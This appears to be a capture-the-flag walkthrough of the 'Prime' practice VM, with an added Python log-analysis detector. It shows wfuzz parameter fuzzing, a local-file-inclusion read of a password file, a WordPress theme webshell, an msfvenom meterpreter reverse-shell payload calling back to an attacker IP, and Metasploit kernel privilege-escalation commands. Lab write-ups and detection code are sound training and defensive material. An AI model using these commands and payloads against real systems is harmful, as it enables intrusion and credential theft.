Target VM download: click here

This machine is designed for those who are trying to prepare for the OSCP or OSCP exam.

This is the first level of the Prime series. Some help is given at every stage. The machine is lengthy, as OSCP and Hackthebox machines are designed.

So you have a target: get the root flag as well as the user flag. If stuck on a point, some help is given at the enumeration level. If any extra help is needed

0x00 Information gathering

Use Kali's fping command to discover live hosts; the target's IP is 192.168.187.136.

Port scan: ports 80 and 22 are open.

Looking at port 80, there is nothing special.

Directory scan yields /dev and /wordpress.

0x01 Gaining access

Visiting /dev gives the following:

hello,

now you are at level 0 stage.

In real life pentesting we should use our tools to dig on a web very hard.

Happy hacking. 

Visiting wordpress: an ordinary WordPress site; in the posts the admin username victor can be seen.

Scan directories again with dirb, specifying the extensions .txt, .php, .html and .zip; something interesting shows up:

Visiting secret.txt gives:

Looks like you have got some secrets.

Ok I just want to do some help to you.

Do some more fuzzing on every php page that you found. And if
you get any right parameter then follow the below steps. If you are still stuck,
learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

//see the location.txt and you will get your next move//

Following the hint, look for the parameter. wfuzz can fuzz request parameter names; with wfuzz the file parameter was found on index.php:

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.187.136/index.php\?FUZZ\=location.txt

The contents of location.txt:

Do something better

ok well Now you reah at the exact parameter

Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun.

Try the secrettier360 parameter on image.php, which was found in the earlier scan:

The login page gives a hint.

Look carefully, here:

Visiting /image.php?secrettier360=/home/saket/password.txt yields the password follow_the_ippsec
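As an added detection example (not part of the original writeup), the following script scans constructed Apache-style access log lines for the two web-layer behaviours seen above: the burst of distinct parameter names that wfuzz's FUZZ sends against index.php, and file-path values in a query string such as the /home/saket/password.txt request to image.php. The log lines, client IPs and the threshold are constructed assumptions.

```python
"""Detect the two web-layer behaviours from this walkthrough in access logs:
parameter-name fuzzing (many distinct query parameter names against one page,
as wfuzz's FUZZ produces) and local-file-inclusion attempts (absolute paths
or traversal in a query value)."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined-log style (not from the target VM).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?file=location.txt HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=location.txt HTTP/1.1" 200 136
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=location.txt HTTP/1.1" 200 136
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?admin=location.txt HTTP/1.1" 200 136
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?debug=location.txt HTTP/1.1" 200 136
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /image.php?secrettier360=/home/saket/password.txt HTTP/1.1" 200 40
10.0.0.5 - - [01/Jan/2024:10:00:10 +0000] "GET /image.php?secrettier360=../../../../etc/hostname HTTP/1.1" 200 30
10.0.0.9 - - [01/Jan/2024:10:00:11 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
# Decoded query values that look like file paths rather than data.
LFI_RE = re.compile(r'(^/|\.\./|\.\.\\|php://|file://)', re.IGNORECASE)
FUZZ_THRESHOLD = 4  # distinct parameter names per (client, path) before flagging

def analyze(log_text):
    """Return parameter-fuzzing suspects and LFI-style requests found in the log."""
    names_seen = defaultdict(set)   # (ip, path) -> distinct query parameter names
    lfi_hits = []                   # (ip, path, param, value)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                # skip lines that are not requests
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so an encoded "../" is seen as "../"
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            names_seen[(m["ip"], parts.path)].add(name)
            if LFI_RE.search(value):
                lfi_hits.append((m["ip"], parts.path, name, value))
    fuzzing = {key: sorted(names) for key, names in names_seen.items()
               if len(names) >= FUZZ_THRESHOLD}
    return {"param_fuzzing": fuzzing, "lfi_attempts": lfi_hits}

if __name__ == "__main__":
    for key, val in analyze(SAMPLE_LOG).items():
        print(key, val)
```

On a real server the threshold should be tuned per page, since legitimate forms can carry several parameters; the point is the unusual count of distinct names from one client against one path.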

Logged into WordPress successfully ^^; in the theme editor, find secret.php:

Write a webshell into it and connect with AntSword:

Found user.txt:

0x02 Privilege escalation

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.187.130 LPORT=8896 -f elf > shell.elf

The web directory is not writable, so the payload was placed in /tmp; session established:

The kernel version is known to be 4.10.0, which has a privilege-escalation vulnerability: click here

use exploit/linux/local/bpf_sign_extension_priv_esc
set session 2
exploit

root^^